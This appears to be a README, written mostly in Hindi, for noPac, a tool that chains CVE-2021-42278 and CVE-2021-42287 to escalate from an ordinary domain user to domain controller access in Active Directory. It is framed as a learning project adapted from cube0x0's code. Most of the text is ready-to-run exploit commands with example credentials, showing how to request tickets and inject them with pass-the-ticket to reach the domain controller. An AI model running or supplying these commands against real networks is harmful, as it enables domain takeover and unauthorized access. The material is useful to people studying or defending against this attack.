
CVE-2021-42287/CVE-2021-42278 शोषक
यह परियोजना noPac के सिद्धांत सीखने के लिए शुरू की गई थी, cube0x0 की परियोजना के आधार पर कुछ बदलाव किए गए। स्रोत कोड में व्यक्तिगत समझ की टिप्पणियाँ जोड़ी गईं।
भेद्यता का विश्लेषण लेख मेरे ब्लॉग पोस्ट पर देखा जा सकता है: noPac 分析
noPac CVE-2021-42278 (sAMAccountName spoofing) और CVE-2021-42287 (KDC को धोखा देना) दो भेद्यताओं का संयुक्त उपयोग है, केवल इन दोनों भेद्यताओं की उपयोग शर्तों को एक साथ पूरा करने पर ही सफलतापूर्वक उपयोग किया जा सकता है।
Examples: Get TGT and ST
noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei
noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs
Examples: PTT
noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice /ptt
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
अधिक सामान्यतया उपयोग की जाने वाली विधि PTT है:
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
noPac का उपयोग करने से पहले DC तक पहुँच नहीं है।

noPac का उपयोग करें।
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

PTT के बाद वर्तमान विंडो में फिर से DC तक पहुँचने पर सफलतापूर्वक पहुँचा जा सकता है।

ध्यान दें कि प्रोग्राम केवल .NET 4.0+ वातावरण वाली मशीनों पर चल सकता है, Windows Server 2012 में डिफ़ॉल्ट रूप से .NET 4.0 होता है, Windows Server 2008 में डिफ़ॉल्ट रूप से .NET 3.5 होता है।
मशीन पर उपलब्ध .NET संस्करण देखें:
dir c:\Windows\Microsoft.NET\Framework64
